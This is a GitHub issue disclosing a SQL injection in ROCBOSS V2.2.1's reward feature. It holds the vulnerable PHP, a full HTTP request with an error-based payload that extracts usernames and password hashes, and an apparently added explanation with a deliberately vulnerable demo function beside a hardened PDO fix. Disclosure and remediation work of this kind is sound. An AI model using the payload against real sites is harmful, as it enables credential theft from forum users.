rocboss / ROCBOSS-OLD

High load, simple micro community software

Home Page: https://rocboss.com


ROCBOSS V2.2.1 has SQL injection via the Post:doReward score parameter.

blankqaz opened this issue

Note that verifying the SQL injection requires registration and score > 1.
https://github.com/rocboss/ROCBOSS/blob/master/app/controllers/frontend/PostController.php#L460

if ($uid > 0) {
    if ($score >= 1 && $score <= 1000) {   // loose comparison on the raw request string; the payload below still passes
        $topic = TopicModel::m()->getByTid($tid);
        if (!empty($topic)) {
            if ($topic['uid'] == $uid) {
                parent::json('error', '抱歉,不能打赏自己的主题');   // "Sorry, you cannot reward your own topic"
            }
            $userScore = UserModel::m()->getUserScore($uid);
            if ($userScore < $score) {
                parent::json('error', '您的积分余额('.$userScore.')不足以支付');   // "Your score balance (N) is insufficient to pay"
            }
            // ... continues to the UPDATE below

https://github.com/rocboss/ROCBOSS/blob/master/app/controllers/frontend/PostController.php#L482

$score is not filtered, and the SQL statement is executed directly:
$ret = $db->exec("UPDATE `roc_user` SET `score` = `score` - ".$score." WHERE `uid` = ".$uid);

Send the following HTTP request (handled by frontend\Post:doReward):

POST /do/reward/3 HTTP/1.1
Host: 192.168.123.1:8080
Content-Length: 228
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://192.168.123.1:8080
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.123.1:8080/read/3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=knbbc98gv9vk73rlpd0hnq3t73; XDEBUG_SESSION=12790; roc_login=wadwagd; roc_secure=6f88bb85-0a26-b350-7531-a01b38583fab; Hm_lvt_48042604b3c7a9973810a87540843e34=1555140928; Hm_lpvt_48042604b3c7a9973810a87540843e34=1555256375
Connection: close

score=1+and(select+1+from(select+count(*),concat(((select+(SELECT+concat(username,0x7e,`password`)+FROM+roc_user+LIMIT+0,1))),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)&_csrf=e08b5c447d9d69f7aef921aef1e8fa89

[Screenshot: Snipaste_2019-04-15_00-15-43]
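The payload above works because the raw `score` string survives the `>= 1 && <= 1000` check (a loose comparison on a leading-numeric string) and is then spliced into the `UPDATE` as SQL text; the `(select ... floor(rand(0)*2) ... group by x)` subquery is MySQL's classic duplicate-key error trick, so the error message the page returns carries `username~password` from `roc_user`. The following is an added example, not ROCBOSS code: it reproduces the vulnerable shape of the update beside a hardened version that validates the type and range, binds the values with PDO instead of concatenating them, and folds the balance check into the `UPDATE` so check and deduction are one atomic statement. Function names, the `$pdo` handle and the SQLite demo data are assumptions; because the `rand(0)` trick is MySQL-specific, the stand-alone demo instead uses a WHERE-rewriting payload that makes another user pay.

```php
<?php
declare(strict_types=1);

// Added example, not ROCBOSS code. Assumes a PDO connection to a table
// `roc_user` with `uid` and `score` columns; function names and the demo
// data below are constructed for this example.

// Vulnerable shape: the range check is a loose comparison on the raw request
// string, and the string is then spliced into the UPDATE as SQL text.
function deductScoreVulnerable(PDO $pdo, int $uid, string $score): int
{
    if ($score >= 1 && $score <= 1000) {  // "1 WHERE ..." is not rejected here
        $sql = "UPDATE `roc_user` SET `score` = `score` - " . $score . " WHERE `uid` = " . $uid;
        return $pdo->exec($sql);
    }
    return 0;
}

// Hardened: validate type and range first, bind values instead of
// concatenating them, and put the balance check into the UPDATE itself so
// two concurrent rewards cannot both spend the same balance.
function deductScoreSafe(PDO $pdo, int $uid, $rawScore): array
{
    $score = filter_var($rawScore, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 1000]]);
    if ($score === false) {
        return ['error', 'score must be an integer between 1 and 1000'];
    }
    // Two placeholders for the same value: MySQL native prepares do not
    // allow reusing one named placeholder twice.
    $stmt = $pdo->prepare(
        'UPDATE `roc_user` SET `score` = `score` - :amount ' .
        'WHERE `uid` = :uid AND `score` >= :minimum'
    );
    $stmt->bindValue(':amount', $score, PDO::PARAM_INT);
    $stmt->bindValue(':minimum', $score, PDO::PARAM_INT);
    $stmt->bindValue(':uid', $uid, PDO::PARAM_INT);
    $stmt->execute();
    if ($stmt->rowCount() !== 1) {
        return ['error', 'insufficient score balance'];
    }
    return ['success', $score];
}

// Stand-alone demo on an in-memory SQLite database (constructed data).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE `roc_user` (`uid` INTEGER PRIMARY KEY, `score` INTEGER NOT NULL)');
$pdo->exec('INSERT INTO `roc_user` (`uid`, `score`) VALUES (2, 50), (3, 10)');

// Attacker is uid 3; the payload rewrites the WHERE clause so uid 2 pays.
$payload = '1 WHERE `uid` = 2 --';
deductScoreVulnerable($pdo, 3, $payload);
print_r($pdo->query('SELECT `uid`, `score` FROM `roc_user` ORDER BY `uid`')->fetchAll(PDO::FETCH_ASSOC));

// The same payload never reaches SQL in the hardened path, and a reward
// larger than the balance is refused by the WHERE clause.
print_r(deductScoreSafe($pdo, 3, $payload));
print_r(deductScoreSafe($pdo, 3, '5'));
print_r(deductScoreSafe($pdo, 3, '500'));
```

Run it with `php example.php` on any PHP build with the `pdo_sqlite` extension. The loose-comparison check is kept in the vulnerable function on purpose: on PHP 7 the string is coerced to its leading `1`, and on PHP 8 the comparison is done as strings, so in both cases the range check passes and the only real defence is the integer validation plus bound parameters in the hardened version.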

commented

Thanks for reminding.